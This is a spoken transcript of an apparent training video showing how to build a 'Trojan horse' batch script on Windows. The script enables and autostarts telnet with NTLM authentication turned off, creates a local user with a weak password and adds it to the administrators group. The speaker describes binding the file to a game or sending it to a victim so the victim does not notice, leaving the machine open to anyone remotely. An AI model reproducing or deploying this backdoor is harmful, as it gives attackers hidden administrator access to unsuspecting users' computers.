Hello everyone, I'm Pradeep Duvedi from Koenig Solutions. This is the second part where I'm going to show you the practical of Trojan horses, how to make Trojan horse using batch scripting. Let's see the practical. Here I have one Windows 7 machine and one XP machine which I want to hack using the Trojan horse. So let's create a batch script. Open a notepad. I'm going to do the batch scripting here. Echo off, it will off the message. SC config, I'm going to configure telnet server. Equal to auto. It will start the telnet server automatically. Then it will start telnet server if it is not started. Then telnet admin config security label equal to minus ntlm. Ntlm is a new technology lm hash, which I am going to do 0. Telnet admin config mode will be stream. Then I'm creating net user called Koenig, and I'm going to add that user. Then net user Koenig and password 12345. Then net local group will be administrator, means I will add this group into means I will add this user into administrator group. And then exit. This is the code which I am going to save as dot bat. So I am saying Koenig dot bat, or I can save as telnet server dot bat, something like that. I will bind this file behind a good game, or I can send this file direct to the victim computer. So I will copy this file and I will paste here. Even I had pasted before the same file. If we go and see the edit, there is echo off, the same thing is here. But here the username which I am going to create, that is hacker, I can rename it with the Koenig. Here I am going to rename the same thing here. Now I am going to save. If this file will run, first of all I am going to show you there is no user called Koenig. There is a Pradeep and administrator, but when I will run this file, automatically one user will be created this is coinic, and the user doesn't know what happened. After creating the user in this machine, anyone can access from online. Thanks for watching.